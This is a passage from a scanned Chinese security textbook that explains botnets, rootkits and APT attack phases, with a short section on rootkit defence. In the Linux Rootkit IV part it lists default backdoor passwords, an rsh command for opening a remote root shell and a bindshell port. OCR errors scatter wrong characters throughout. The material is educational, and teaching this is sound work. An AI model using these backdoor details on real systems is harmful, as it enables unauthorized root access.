Botnet 中 ,感染 Bot 程序 的 主机 会 登录 到 指定 的 服务 需 和 频道 中 去 ,在 登录 成 功 后 ,在 频道 
中 等 竺 控制 者 发 来 的 恶意 指令 。 

3) 控制 阶段 

在 控制 阶段 ,攻击 者 通过 中 心服 务 需 发 送 预 先 定 义 好 的 控制 指令 ,让 僵尸 计算 机 执行 恶 
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意 行为 。 典 型 的 恶意 行为 是 发 起 DDoS 攻击 、 欠 取 主机 敏感 信息 、 升 级 恶意 程序 等 。 

5. 僵尸 网 络 的 分 类 

Botnet 根据 分 类 标准 的 不 同 ,可 以 有 许多 种 分 类 方法 ,分 别 描 述 如 下 。 

1) 按 Bot 程序 的 种 类 分 类 

(1) Agobot/yPhatbot/yForbot/XtremBot。 这 些 是 最 著名 的 僵尸 工具 。 防 病毒 厂商 
Spphos 列 出 了 超过 500 种 已 知 的 不 同 版 本 的 Agobot。Asgobot 最 新 版 本 的 代码 采用 C++ 编 
写 ,代码 清晰 并 且 具 有 良好 的 抽象 设计 ,以 模块 化 的 方式 组 合 , 添 加 命令 或 者 其 他 漏洞 的 扫 
描 器 及 攻击 功能 非常 简单 。 为 了 对 抗 逆 问 工程 分 析 ,Agobot 设计 了 监测 调试 名 (CSoftice 和 
OllyDbg) 和 虚拟 机 (VMware 和 Virtualy PC) 的 功能 。 

(2) SDBot/RBot/UrBot/SpyBot。 这 个 家 族 是 目前 最 活跃 的 Bot 程序 。SDBot 由 C 语 
言 写 成 , 它 提供 了 和 Agobot 一 样 的 功能 特征 ,但 是 命令 集 较 小 ,实现 也 没 那 么 复杂 。 它 是 
基于 IRC 协议 的 一 类 Bot 程序 。 

(3) GT-Bots。GT-Bots 是 基于 IRC 客户 端 程序 mIRC 编写 的 。 这 类 僵尸 工具 用 脚本 
和 其 他 二 进 制 文件 开启 一 个 mIRC 聊天 客户 端 , 但 会 隐藏 原 mIRC 窗口 。 通 过 执行 mIRC 
脚本 连接 到 指定 的 服务 器 频道 上 ,等 待 恶 意 命令 。 

2) 按 Botnet 的 控制 方式 分 类 

(1) IRC Botnet。 这 类 Botnet 利用 IRC 协议 进行 控制 和 通信 。 目 前 绝 大 多 数 Botnet 
都 属于 这 一 类 ,如 Spybot、GTbot 和 SDbot 等 。 

(2) AOL Botnet。 这 类 Botnet 是 依托 AOL 这 种 即时 通信 服务 形成 的 网 络 而 建立 的 ， 
被 感染 主机 登录 到 固定 的 服务 需 上 接收 控制 命令 。AIM-Canbot 和 Fizzer 就 采用 了 AOL 
Instant Messager 实现 对 Bot 的 控制 。 

(3) P2P Botnet。 这 类 Botnet 中 使 用 的 Bot 程序 本 和 号 包含 7 了 P2P 的 客户 端 , 可 以 连 入 
采用 Gnutella 技术 (一 种 开放 源码 的 文件 共享 技术 ) 的 服务 硕 , 利 用 WASTE 文件 共享 协议 
进行 相互 通信 。 巾 于 这 种 协议 分 布 式 地 进行 连接 ,就 使 得 每 一 个 僵尸 主机 可 以 很 方便 地 找 
到 其 他 的 僵尸 主机 并 进行 通信 ,而 当 有 一 些 Bot 被 查 杀 时 ,并 不 会 影响 到 Botnet 的 生存 , 因 
此 这 类 Botnet 具有 不 存在 单 点 失效 但 实现 相对 复杂 的 特点 。Agobot 和 Phatbot 采用 了 
P2P 的 方式 。 

6. 僵尸 网 络 的 危害 

Botnet 构成 了 一 个 攻击 平台 ,利用 这 个 平台 可 以 有 效 地 发 起 各 种 各 样 的 攻击 行为 。 这 
种 攻击 可 以 导致 整个 基础 信息 网 络 或 者 重要 应 用 系统 瘫痪 ,也 可 以 导致 大 量 机 密 或 个 人 隐 
私 泄 露 ,还 可 以 用 来 从 事 网 络 欺 诈 等 其 他 违法 犯罪 活动 。 下 面 是 已 经 发 现 的 利用 Botnet 发 
动 的 攻击 行为 。 

(1) DDoS 攻击 。 使 用 Botnet 发 动 DDoS 攻击 是 当前 最 主要 的 威胁 之 一 。 攻 击 者 可 以 
回 上 自己 控制 的 所 有 僵尸 计算 机 发 送 指令 ,让 它们 在 特定 的 时 间 同 时 开始 连续 访问 特定 的 网 
络 目标 ,从 而 达到 DDoS 的 目的 。 由 于 Botnet 可 以 形成 庞大 规模 ,而 且 利 用 其 进行 DDoS 
攻击 可 以 做 到 更 好 地 同步 ,因此 在 发 布控 制 指 令 时 ,能 够 使 得 DDoS 的 危害 更 大 ,防范 更 难 。 

(2) 发 送 垃圾 邮件 。 一 些 Bots 会 设立 Sock v4、v5 代理 ,这 样 就 可 以 利用 Botnet 发 送 
大 量 的 垃圾 邮件 ,而 且 发 送 者 可 以 很 好 地 隐藏 自身 的 IP 信息 。 
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(3) 窃取 秘密 。Botnet 的 控制 者 可 以 从 僵尸 主机 中 窃取 用 户 的 各 种 敏感 信息 和 其 他 秘 
密 , 如 个 人 账号 、 机 密 数 据 等 。 同 时 ,Bot 程序 能 够 使 用 Sniffer 观测 感 兴 趣 的 网 络 数据 ,从 
而 获得 网 络 流量 中 的 秘密 。 

(4) 滥用 资源 。 攻 击 者 利用 Botnet 从 事 各 种 需要 耗费 网 络 资源 的 活动 ,从 而 使 用 户 的 
网 络 性 能 受到 影响 ,甚至 带 来 经 济 损失 。 

可 以 看 出 ,Botnet 无 论 是 对 整个 网 络 还 是 对 用 户 自 身 , 都 造成 了 比较 严重 的 危害 ,必须 
要 采取 有 效 的 方法 减少 Botnet 的 危害 。 


9.5 Rootkit 恶意 代码 


Rootkit 出 现 于 20 世纪 90 年 代 初 。1994 年 2 月 ,在 CERT/CC 发 布 的 一 篇 名 为 
Ongoing Network Monitoring Attacks(CA-1994-01) 的 安全 咨询 报告 中 ,Rootkit 这 个 名 词 
首先 被 使 用 。 从 出 现 至 今 ,Rootkit 的 技术 发 展 非常 迅速 ,应 用 越 来 越 广泛 ,检测 难度 也 越 来 
越 大 。 其 中 针对 SunOS 和 Linux 两 种 操作 系统 的 Rootkit 最 多 。 

1。. Rootkit 的 定义 


Rootkit 是 攻击 者 用 来 隐藏 目 己 足迹 和 保留 root 访问 权限 的 工具 。 通 篆 , 攻 击 者 通过 
远程 攻击 获得 root 访问 权限 。 获 得 root 权限 前 ,攻击 者 需要 通过 密码 猜测 或 者 密码 强制 破 
详 的 方式 获得 系统 的 访问 权限 。 进 入 系统 后 ,如 果 还 没有 获得 root 权限 ,再 通过 某 些 安全 
漏洞 获得 系统 的 root 权限 。 接 着 ,攻击 者 会 在 侵入 的 主机 中 安装 Rootkit, 然 后 它 就 会 经 前 
通过 Rootkit 的 后 门 检 查 系 统 是 否 有 其 他 用 户 登 录 , 如 果 只 有 攻击 者 本 人 ,攻击 者 就 开始 着 
手 清理 日 志 中 的 有 关 人 信息。 另外 ,攻击 者 可 以 通过 Rootkit 中 的 嗅 探 工具 截获 网 络 中 其 他 
系统 的 用 户 和 口令 ,并 且 可 以 利用 这 些 信 息 侵 入 其 他 的 系统 。 

2. Rootkit 的 内 容 

所 有 的 Rootkit 基本 上 都 是 由 几 个 独立 的 程序 组 成 的 。 一 个 典型 Rootkit 包括 如 下 一 
些 独立 的 程序 。 

(1) 网 络 嗅 探 程序 。 网 络 咯 探 程序 用 于 获得 网 络 上 传输 的 用 户 名 和 密码 等 信息 。 典 型 
的 工具 包括 Sniffer Pro 等 。 

(2) 特洛伊 木马 程序 。 特 洛 伊 木 马 程序 用 于 为 攻击 者 提供 后 门 。 典 型 的 木马 程序 包括 
inetd login 等 。 

(3) 隐 城 攻击 者 的 目录 和 进程 的 程序 。 该 类 程序 是 为 了 隐藏 攻击 者 的 痕迹 的 ,如 隐 城 
攻击 者 在 目标 主机 上 创建 的 目录 ,以 及 在 目标 主机 上 启动 的 进程 。 典 型 的 工具 包括 ps、 
netstat rshd ls 等 。 

(4) 日 志清 理工 具 。 攻 击 者 使 用 这 些 清理 工具 删除 wtmp、utmp 和 lastlog 等 日 志文 件 
中 有 关 自 己 行踪 的 条 上 日 。 典 型 的 日 志清 理工 具 包 括 zap、zap2、z2 等 。 

(5) FIX 程序 。FIX 能 够 根据 原来 的 程序 伪造 蔡 代 程序 的 3 个 时 间 惟 (atime、 ctime、 
mtime) date、permission 所属 用 户 和 所 属 用 户 组 。 在 安装 Rootkit 之 前 ,攻击 者 可 以 先 使 
用 这 个 程序 做 一 个 系统 二 进 制 代码 的 快照 ,然后 再 安 疫 蔡 代 程序 。 
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(6) 其 他 工具 。 一 些 复杂 的 Rootkit 还 可 以 回 攻 击 者 提供 telnet、Shell 和 finger 等 服务 。 
此 外 ,Rootkit 还 可 能 包括 一 些 用 来 清理 /var/log 和 /var/ adm 目录 中 其 他 文件 的 一 些 脚 本 。 
3. Rootkit 的 使 用 过 程 


在 熟悉 Rootkit 工具 后 ,攻击 者 就 可 能 用 这 些 工 具 攻 击 一 些 系 统 , 典 型 的 攻击 过 程 简单 
概述 如 下 。 

攻击 者 使 用 Rootkit 中 的 相关 程序 替代 系统 原来 的 ps \ls .netstat .df 等 程序 ,使 系统 管 
理 员 无 法 通过 这 些 工 具 发 现 自己 的 踊 迹 。 接 着 ,攻击 者 使 用 日 志清 理工 具 清 理 系统 日 志 ， 
毁 自 己 的 踊 迹 。 然 后 ,攻击 者 会 经 常 通过 安装 的 后 门 进入 系统 查看 嗅 探 器 的 日 志 , 以 发 起 对 
周围 其 他 系统 的 攻击 。 

如 果 攻 击 者 能 够 准确 地 使 用 这 些 应 用 程序 ,并且 在 安装 Rootkit 时 行为 谨慎 ,就 会 让 系 
统管 理 员 很 难 发 现 系统 已 经 被 侵入 ,直到 某 一 天 其 他 系统 的 管理 员 和 他 联系 或 者 嗅 探 器 的 
日 志 把 磁盘 全 部 填 满 ,他 才 会 察觉 已 经 大 祸 临 涉 了 。 但 是 ,大 多 数 攻 击 者 在 清理 系统 日 志 时 
不 是 非常 小 心 或 者 干脆 把 系统 日 志 全 部 删除 了 事 , 和 警觉 的 系统 管理 员 可 以 根据 这 些 异 常情 
况 判 断 出 系统 已 被 侵入 。 不 过 ,在 系统 恢复 和 清理 过 程 中 ,大 多 数 和 常用 的 命令 如 ps、df 和 1s 
已 经 不 可 信 了 

4. Linux Rootkit IV 


大 部 分 Rootkit 是 针对 Linux 和 SunOS 两 类 操作 系统 的 ,Windows 下 的 Rootkit 比较 
罕见 。Linux Rootkit IV 就 是 一 个 典型 的 针对 Linux 系统 的 .开放 源码 的 Rootkit。 它 由 
Lord Somer 编写 ,并 于 1998 年 11 月 发 布 (Linux Rootkit IV 只 能 用 于 Linux 2. x 的 内 核 ) 。 
不 过 ,这 不 是 第 一 个 Linux Rootkit ,在 它 之 前 有 jlrk lnrk Ilrk2 和 1lrk3 等 Linux Rootkit。 这 
些 Rootkit 包括 常用 的 Rootkit 组 件 , 如 嗅 探 吉 .日 志 编 辑 / 删 除 工 具 和 后 门 程序 等 。 

经 过 这 么 多 年 的 发 展 ,Linux Rootkit IV 功能 变 得 越 来 越 完 善 , 具 有 的 特征 也 越 来 越 
多 。 尽 管 Linux Rootkit IV 的 代码 量 非 常 庞大 , 却 非常 易于 安装 和 使 用 ,只 要 执行 make 
install 就 可 以 成 功 安装 。 如 果 还 要 安装 一 个 shadow 工具 ,只 要 执行 make shadow install 
就 可 以 了 。 下 面 简 单 地 介绍 Linux Rootkit IV 包含 的 各 种 工具 ,详细 的 介绍 请 参考 其 发 布 
包 的 README 文件 。 

1) 隐藏 入 侵 者 行 踩 的 程序 

为 了 隐藏 入 侵 者 的 行踪 ,Linux Rootkit IV 的 作者 可 谓 伍 费心 机 ,编写 了 许多 系统 命令 
的 奉 代 程序 ,使 用 这 些 程序 代替 原 有 的 系统 命令 ,来 隐藏 入侵 者 的 行踪 。 隐 藏 入 侵 者 行踪 的 
程序 又 可 以 分 为 如 下 几 组 。 

(1) ls ,find\.du。 这 些 程序 会 阻止 显示 和 人 侵 者 的 文件 及 计算 入 侵 者 文件 占用 的 空间 。 
在 编译 之 前 ,入 侵 者 可 以 通过 ROOTKIT_FILES_FILE 设置 自己 的 文件 所 处 的 位 置 ,默认 
是 /dev/ptyr。 注 意 , 如 果 在 编译 时 使 用 了 SHOWFLAG 选项 ,就 可 以 使 用 1s-/ 命 令 列 出 所 
有 的 文件 。 这 几 个 程序 还 能 够 自动 隐藏 所 有 名 称 为 ptyr、hack. dir 和 W4r3z 的 文件 。 

(2) ps top\pidof。 这 几 个 程序 用 来 隐藏 所 有 与 人 侵 者 相关 的 进程 。 

(3) Netstat。 隐 藏 出 /人 指定 IP 地 址 或 者 端口 的 网 络 数据 流量 。 

(4) Killall: 不 会 终止 被 和 人 侵 者 隐藏 的 进程 。 

(5) Ifconfig。 如 果 入 侵 者 启动 了 嗅 探 器 ,这 个 程序 就 阻止 PROMISC 标记 的 显示 ,使 
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系统 管理 员 难 以 发 现 网 络 接口 已 经 处 于 混杂 模式 下 。 

(6) Crontab 。 隐 藏 有 关 攻 击 者 的 crontab 条 目 。 

(7) Tecpd。 阻 止 器 日 志 中 记录 某 些 连接 。 

(8) Syslogdo 过 滤 挥 日 志 中 的 某 些 连接 信息 。 

2) 权限 提升 程序 

权限 提升 程序 主要 为 攻击 者 提供 权限 提升 工具 。 这 类 程序 又 分 为 如 下 几 组 。 

(1) Chfn。 提 升 本 地 普通 用 户 权限 的 程序 。 运 行 Chfn, 在 它 提示 输入 新 的 用 户 名 时 ， 
如 果 用 户 输 入 Rookit 密码 ,他 的 权限 就 被 提升 为 root。 默 认 的 Rootkit 密码 是 satori。 

(2) Chsh。 也 是 一 个 提升 本 地 用 户 权 限 的 程序 。 运 行 Chsh, 在 它 提示 输入 新 的 Shell 
时 ,如 果 用 户 输入 Rootkit 密码 ,他 的 权限 就 被 提升 为 root。 

(3) Passwd。 与 上 面 两 个 程序 的 作用 相同 。 在 提示 用 户 输入 新 密码 时 ,如 果 输 入 
Rootkit 密码 ,权限 就 可 以 变 成 root。 

(4) Login。 人 允许 使 用 任何 账户 通过 Rootkit 密码 登录 。 如 果 使 用 root 账户 登录 被 拒 
绝 , 可 以 尝试 一 下 rewt。 当 使 用 后 门 时 ,这 个 程序 还 能 够 禁止 记录 命令 的 历史 记录 。 

3) 木马 网 络 监控 程序 

木马 网 络 监控 程序 为 远程 攻击 者 提供 后 门 , 可 以 癌 远 程 攻 击 者 提供 inetd、rsh、ssh 等 服 
务 ,具体 因 版 本 而 异 。 随 着 版 本 的 升级 ,Linux Rootkit IV 的 功能 也 越 来 越 强 大 ,特征 也 越 
来 越 丰富 。 一 般 包 括 如 下 几 类 网 络 服务 程序 。 

(1) Inetd。 特 洛 伊 Inetd 程序 ,为 攻击 者 提供 远程 访问 服务 。 

(2) Rshd。 为 攻击 者 提供 远程 Shell 服务 。 攻 击 者 使 用 rsh-lrootkit password host 
command 命令 就 可 以 启动 一 个 远程 root shell。 

(3) Sshd。 为 攻击 者 提供 ssh 服务 的 后 门 程序 。 

4) 工具 程序 

所 有 不 属于 以 上 类 型 的 程序 都 可 以 归 和 人 这 个 类 型 ,它们 实现 一 些 如 日 志清 理 、 报 文 嗅 控 
及 远程 Shell 的 端口 绑 定 等 功能 。 这 类 程序 包括 如 下 几 种 。 

(1) Fix。 文 件 属性 伪造 程序 。 

(2) Linsniffer。 报 文 嗅 探 硕 程序 。 

(3) Sniffchk。 一 个 简单 的 Bash shell 脚本 ,检查 系统 中 是 否 正 有 一 个 咒 探 帮 在 运行 。 

(4) Wted。wtmp/utmp 日 志 编 辑 程 序 。 可 以 使 用 这 个 工具 编辑 所 有 wtmp 类 型 或 者 
utmp 类 型 的 文件 。 

(5) z2。utmp/wtmp/lastlog 日 志清 理工 具 。 可 以 删除 utmp/wtmp/lastlog 日 志文 件 
中 有 关 某 个 用 户 名 的 所 有 和 条目。 不 过 ,如 果 用 于 Linux 系统 需要 手工 修改 其 源 代码 ,设置 日 
志文 件 的 位 置 。 

(6) Bindshell。 在 某 个 端口 上 绑 定 Shell 服务 ,默认 端口 是 12497, 为 远程 攻击 者 提供 
Shell 服务 。 

S。Rootkit 的 防范 

很 显然 ,只 有 使 网 络 非常 安全 ,让 攻击 者 无 机 可 乘 , 才 能 使 自己 的 网 络 免 受 Rootkit 的 
影响 。 不 过 ,恐怕 没有 人 能 够 提供 这 个 保证 ,但 是 在 日 常 的 网 络 管理 维护 中 保持 一 些 良好 的 
习惯 ,能 够 在 一 定 程度 上 避免 由 Rootkit 造成 的 损失 ,并 及 时 发 现 Rootkit 的 存在 。 要 防范 
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Rootkit ,必须 注意 以 下 几 点 。 

(1) 不 要 在 网 络 上 使 用 明文 传输 口令 ,或 者 使 用 一 次 性 口令 。 这 样 , 即 使 用 户 的 系统 已 
经 被 装 入 了 Rootkit, 攻 击 者 也 无 法 通过 网 络 监听 来 获得 更 多 用 户 账 号 和 口令 ,从 而 避免 人 
侵 的 蔓延 。 

(2) 使 用 Tripwire 和 AIDE 等 完整 性 检测 工具 能 够 及 时 地 帮助 用 户 发 现 攻击 者 的 人 
侵 。Tripwire 和 AIDE 等 工具 不 同 于 其 他 的 入 侵 检 测 工 具 , 它 们 不 是 通过 所 谓 的 攻击 特征 
码 来 检测 入 侵 行为 ,而 是 监视 和 检查 系统 发 生 的 变化 。Tripwire 首先 使 用 特定 的 特征 码 函 
数 为 需要 监视 的 系统 文件 和 目录 建立 一 个 特征 数据 库 。 所 谓 特 征 码 函数 ,就 是 使 用 任意 的 
文件 作为 输入 ,产生 一 个 固定 大 小 的 数据 (特征 码 ) 的 图 数 , 通 稼 情况 下 这 个 特征 码 可 以 选择 
MD5 摘要 或 校 验 和 等 。 入 侵 者 如 果 对 文件 进行 了 修改 ,即使 文件 大 小 不 变 , 也 会 破坏 文件 
的 特征 码 。 利 用 这 个 数据 库 ,Tripwire 可 以 很 容易 地 发 现 系统 的 变化 。 文 件 的 特征 码 几 乎 
是 不 可 能 伪造 的 ,因此 ,系统 的 任何 变化 都 逃 不 过 Tripwire 的 监视 。 


9.6 融 级 持续 性 威胁 


高 级 持续 性 威胁 (Advanced Persistent Threat,APT) 是 利用 先进 的 攻击 手段 对 特定 目 
标 进行 长 期 持续 性 网 络 攻 击 的 攻击 形式 。 

江海 客 水 波 等 信息 安全 工作 者 的 观点 是 “所 谓 APT 攻击 并 非 是 真正 存在 的 ”。 因 为 
从 本 质 上 讲 ,APT 攻击 并 没有 任何 加 新 的 攻击 手段 。APT 中 运用 的 攻击 手段 ,如 0 day 漏 
洞 .钓鱼 邮件 .社会 工程 学 .木马 和 DDoS 等 ,都 是 存在 已 久 的 攻击 手段 。APT 只 是 多 种 攻 
击 手段 的 综合 利用 而 已 。 因 此 ,在 业界 有 一 种 看 法 是 APT 应 该 是 国 与 国之 间 、 组 织 与 组 织 
之 间 网 络 战 的 一 种 具体 表现 形式 ,而 不 是 一 种 可 供 炒 作 的 黑客 入 侵 手 段 。 


9.6.1 APT 的 攻击 过 程 


APT 攻击 集合 了 多 种 和 常见 攻击 方式 多 种 攻击 途径 来 答 试 突破 被 攻击 目标 的 网 络 防 
御 。 例 如 ,APT 也 会 像 普通 的 攻击 一 样 ,通过 Web 或 电子 邮件 传输 特点 信息 ,利用 应 用 程 
序 或 操作 系统 的 漏洞 利用 传统 的 网 络 保护 机 制 无 法 提供 统一 的 防御 等 技术 手段 。 除 了 使 
用 多 种 途径 ,APT 还 采用 多 个 阶段 渗透 一 个 网 络 ,然后 提取 有 价值 的 信息 ,这 使 得 它 的 攻击 
更 不 容易 被 发 现 。 一 般 而 言 ,APT 的 整个 攻击 生命 周期 可 以 分 为 5 个 阶段 。 

第 一 阶段 : 定向 搜 息 收集 

在 定向 信息 收集 阶段 ,攻击 者 有 针对 性 地 搜集 特定 组 织 的 网 络 系统 和 员工 信息 。 信 息 
搜集 方法 很 多 ,包括 网 络 隐蔽 扫 摘 和 社会 工程 学 方法 等 。 从 目前 所 发 现 的 APT 攻击 手法 
来 看 ,大 都 是 从 组 织 员 工人 手 , 因 此 ,攻击 者 非常 注意 搜集 组 织 员 工 的 信息 ,包括 员工 的 
社交 网 络 ( 微 信和 、 微 博 、 博 客 、Facebook、Twitter 等 )、. 邮 件 .电话 通讯 录 等 ,以 便 了 解 他 们 的 
社会 关系 及 其 爱好 ,然后 通过 社会 工程 学 方法 来 攻击 该 员工 的 计算 机 ,从 而 进入 组 织 
网 络 。 

在 APT 攻击 中 ,攻击 者 会 花 几 个 月 甚至 更 长 的 时 间 对 “目标 ”网 络 进行 踩点 ,有 针对 性 地 进 
行 环 境 探测 和 信息 搜集 ,包括 线 上 服务 天 分 布 情况 .应 用 程序 的 弱点 .业务 状况 员工 信息 等 。 
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第 二 阶段 : 单 点 攻击 突破 

搜集 了 足够 的 信息 后 ,APT 攻击 者 会 采用 一 切 可 以 利用 的 手段 攻击 组 织 员工 的 个 人 计 
算 机 ,设法 实现 单 点 突破 。 在 多 数 情况 下 ,攻击 者 会 问 目 标 公 司 的 员工 发 送 邮 件 ,诱骗 其 打 
开 恶 意 附件 ,或 者 单 击 一 个 经 过 伪造 的 恶意 URL ,希望 利用 常见 软件 (如 Java 或 微软 的 办 
公 软 件 ) 的 0day 漏洞 , 投 送 其 恶意 代码 。 在 单 点 突破 阶段 的 攻击 方法 包括 以 下 几 种 。 

(1) 社会 工程 学 方法 。 社 会 工程 学 就 是 利用 人 的 薄弱 点 (心理 弱点 、 本 能 反应 、 好 奇 心 、 
信任 、 贪 禁 等 心理 陷阱 ) ,通过 欺骗 手段 而 入 侵 计算 机 系统 的 一 种 攻击 方法 。 例 如 ,通过 电子 
邮件 给 攻击 目标 单位 的 员工 发 送 包 含 恶 意 代码 的 文件 附件 , 当 员 工 打开 附件 时 ,员工 的 计算 
机 就 感染 了 恶意 代码 。 

(2) 远程 漏洞 攻击 方法 。 攻 击 者 通过 投 送 恶 意 代 码 , 并 利用 目标 企业 使 用 的 软件 中 的 
漏洞 执行 自身 。 例 如 ,在 员工 经 常 访问 的 网 站 上 放置 网 页 木马 , 当 员 工 访问 该 网 站 时 ,就 遭 
受到 网 页 代码 的 攻击 。 

水 坑 攻击 (Watering Hole) 就 是 利用 漏洞 攻击 的 典型 方法 。 水 坑 攻击 是 指 黑客 通过 分 
析 被 攻击 者 的 网 络 活动 规律 ,寻找 被 攻击 者 经 常 访问 的 网 站 的 弱点 , 先 攻 下 该 网 站 并 植 人 攻 
击 代 码 ,等 待 被 攻击 者 来 访 时 实施 攻击 。 水 坑 攻 击 属于 APT 攻击 的 一 种 ,与 钓鱼 攻击 相 
比 , 黑 客 无 须 耗 费 精力 制作 钓鱼 网 站 ,而 是 利用 合法 网 站 的 弱点 ,隐蔽 性 比较 强 。 在 安全 意 
识 不 断 加 强 的 今天 ,黑客 处 心 积 虑 地 制作 钓鱼 网 站 却 被 有 心 人 轻易 识破 ,而 水 坑 攻 击 则 利用 
了 被 攻击 者 对 网 站 的 信任 。 水 坑 攻 击 利 用 网 站 的 弱点 在 其 中 植 入 攻击 代码 ,攻击 代码 利用 
浏览 器 的 缺陷 ,被 攻击 者 访问 网 站 时 终端 会 被 植 人 恶意 程序 或 者 直接 被 瓷 取 个 人 重要 信息 。 

如 果 漏 洞 利用 成 功 的 话 ,被 攻击 的 系统 将 受到 感染 。 普 通用 户 系统 忘记 打 补 本 是 很 常 
见 的 ,所 以 他 们 很 容易 受到 已 知 和 未 知 的 漏洞 利用 攻击 。 

第 三 阶段 : 构建 通道 

攻击 者 控制 了 员工 个 人 计算 机 后 ,需要 在 攻击 者 和 攻击 目标 之 间 建 立 长 期 的 联系 通道 ， 
以 通过 该 通道 发 送 攻击 指令 传输 数据 等 。 这 个 通道 目前 多 采用 https 协议 构建 ,以 便 突破 
组 织 的 防火 填 。 

最 常用 的 建立 通道 的 方式 是 采用 特洛伊 木马 类 的 远程 控制 工具 。 一 旦 木马 被 植 入 成 
功 , 攻 击 者 就 已 经 从 组 织 防御 内 部 建立 了 一 个 控制 点 。 攻 击 者 最 常安 装 的 就 是 远程 控制 工 
具 。 这 些 远程 控制 工具 是 以 反 向 连接 模式 建立 的 ,其 目的 就 是 允许 从 外 部 控制 员工 计算 机 
或 服务 器 , 即 这 些 工 具 从 位 于 中 心 的 命令 和 控制 服务 器 接收 命令 ,然后 执行 命令 ,而 不 是 远 
程 得 到 命令 。 这 种 连接 方法 使 其 更 难以 检测 ,因为 员工 的 计算 机 是 主动 与 命令 和 控制 服务 
器 通信 而 不 是 相反 。 

第 四 阶段 : 横向 渗透 

一 般 来 说 ,攻击 者 首先 突破 的 员工 个 人 计算 机 并 不 是 攻击 者 感 兴趣 的 , 它 感 兴趣 的 是 组 
织 内 部 其 他 包含 重要 资产 的 服务 器 。 因 此 ,攻击 者 将 以 员工 个 人 计算 机 为 跳板 ,在 系统 内 部 
进行 模 癌 渗透 ,以 攻陷 更 多 个 人 计算 机 和 服务 需 。 攻 击 者 采取 的 横 癌 渗透 方法 包括 口令 千 
听 和 漏洞 攻击 等 。 

第 五 阶段 : 目标 行动 

APT 攻击 者 的 最 终 目标 是 将 敏感 数据 从 被 攻击 的 网 络 非法 传输 到 由 攻击 者 控制 的 外 
部 系统 ,也 就 是 获得 有 价值 的 数据 。 在 发 现 有 价值 的 数据 后 ,APT 攻击 者 往往 要 将 数据 收 
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集 到 一 个 文档 中 ,然后 压缩 并 加 密 该 文档 。 此 操作 可 以 使 其 隐藏 内 容 , 防 止 遭 受 次 度 的 数据 
包 检 查 和 DLP 技术 的 检测 和 阻止 。 最 后 将 数据 从 受害 系统 偷 运 出 去 到 由 攻击 者 控制 的 外 
部 。 大 多 数 公 司 都 没有 针对 这 些 恶意 传输 和 目的 地 分 析出 站 流量 。 


9.6.2 APT 的 特征 


如 果 仅 从 攻击 步骤 来 看 ,APT 攻击 和 普通 的 攻击 行为 没什么 区 别 。 但 APT 之 所 以 称 
为 高 级 可 持续 威胁 , 那 必 然 有 其 特有 的 特征 , 那 就 是 高 级 性 和 持续 性 。 

1. 高 级 性 

APT 攻击 的 方式 相对 于 其 他 攻击 形式 更 为 高 级 ,其 高 级 性 主要 体现 在 3 个 方面 。 

(1) 高 级 的 收集 手段 。APT 在 发 动 攻击 之 前 需要 对 攻击 对 象 的 业务 流程 和 目标 系统 
进行 精确 的 收集 。 在 此 收集 的 过 程 中 ,此 攻击 会 主动 挖掘 被 攻击 对 象 受 信 系 统 和 应 用 程序 
的 漏洞 ,利用 这 些 漏洞 组 建 攻 击 者 所 需 的 网 络 ,并 利用 0day 漏洞 进行 攻击 。 

(2) 威胁 高 级 的 数据 。APT 是 黑客 以 锚 取 核心 资料 为 目的 ,针对 客户 所 发 动 的 网 络 攻 
击 和 侵袭 行为 ,是 一 种 蓄 谋 已 久 的 “恶意 商业 间谍 威胁 ”。 这 种 行为 往往 经 过 长 期 的 经 营 与 
策划 ,并 具备 高 度 的 隐蔽 性 。 

(3) 高 级 的 攻击 手法 。APT 的 特征 之 一 在 于 隐匿 自己 ,针对 特定 对 象 长 期 有 计划 性 
和 组 织 性 地 禄 取 数 据 , 这 种 发 生 在 数字 空间 的 偷 禄 资料 .搜集 情报 的 行为 ,就 是 一 种 “网 络 间 
谍 ” 的 行为 。 

2. 持续 性 

持续 性 是 APT 攻击 最 大 的 威胁 ,其 主要 特征 包括 以 下 几 点 。 

(1) 持续 潜伏 。 它 可 能 在 用 户 环 境 中 存在 一 年 以 上 或 更 久 , 在 此 期 间 不 断 搜集 各 种 信 
息 , 直 到 搜集 到 重要 情报 。 这 些 发 动 APT 攻击 的 黑客 目的 往往 不 是 为 了 在 短 时 间 内 获 利 ， 
而 是 把 “被 控 主 机 ”当成 跳板 ,持续 搜索 ,直到 能 彻底 掌握 所 针对 的 目标 人 、 事 、 物 ,所 以 这 种 
APT 攻击 模式 具有 一 定 的 持续 性 。 

(2) 持续 攻击 。 由 于 APT 攻击 具有 持续 性 甚至 长 达 数 年 的 特征 ,这 让 企业 的 管理 人 员 
无 从 察觉 。 在 此 期 间 , 这 种 “持续 性 ”体现 在 攻击 者 不 断 尝 试 的 各 种 攻击 手段 ,以 及 渗透 到 网 
络 内 部 后 长 期 扑 伏 。 

(3) 持续 欺骗 。 针 对 特定 政府 或 企业 ,长 期 进行 有 计划 性 ,组织 性 的 甸 取 情报 行为 , 针 
对 被 锁定 对 象 寄 送 几 可 乱 真 的 社交 工程 恶意 邮件 ,如 冒充 客户 的 来 信 , 取 得 在 计算 机 植 入 恶 
意 软件 的 第 一 个 机 会 。 

(4) 持续 控制 。 攻 击 者 建立 一 个 类 似 僵 尸 网 络 Botnet 的 远程 控制 架构 ,攻击 者 会 定期 
传送 有 潜在 价值 文件 的 副本 给 命令 和 控制 服务 器 (C&C Server) 审 查 。 将 过 滤 后 的 敏感 机 
密 数据 利用 加 密 的 方式 外 传 。 


9.6.3 ” 暴 型 的 APT 案例 


APT 攻击 者 的 目标 是 长 期 有 计划 性 和 组 织 性 地 甸 取 数据 。 这 种 攻击 往往 是 以 破坏 国 
家 或 大 型 企业 的 关键 基础 设施 为 目标 。 国 际 上 最 典型 的 案例 是 针对 Google 的 APT 攻击 事 
件 。2010 年 ,Google 的 一 名 雇员 点 击 即时 消息 中 的 一 条 恶意 链接 ,引发 了 一 系列 事件 导致 
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Google 的 网 络 被 渗透 数 月 ,并 造成 各 种 系统 数据 被 禄 取 。 

此 次 APT 攻击 者 首先 寻找 特定 的 Google 员工 成 为 攻击 者 的 目标 。 攻 击 者 尽 可 能 地 收 
集 该 员工 在 Facebook Twitter 和 其 他 社交 网 站 上 发 布 的 信息 。 然 后 攻击 者 利用 一 个 动态 
DNS 供应 商 来 建立 一 个 托管 伪造 照片 网 站 的 Web 服务 器 。 利 用 这 个 伪造 的 Web 服务 器 ， 
攻击 者 伪造 成 这 位 Google 员工 所 信任 的 人 ,并 向 他 发 送 了 恶意 链接 。 员 工 点击 了 这 个 未 知 
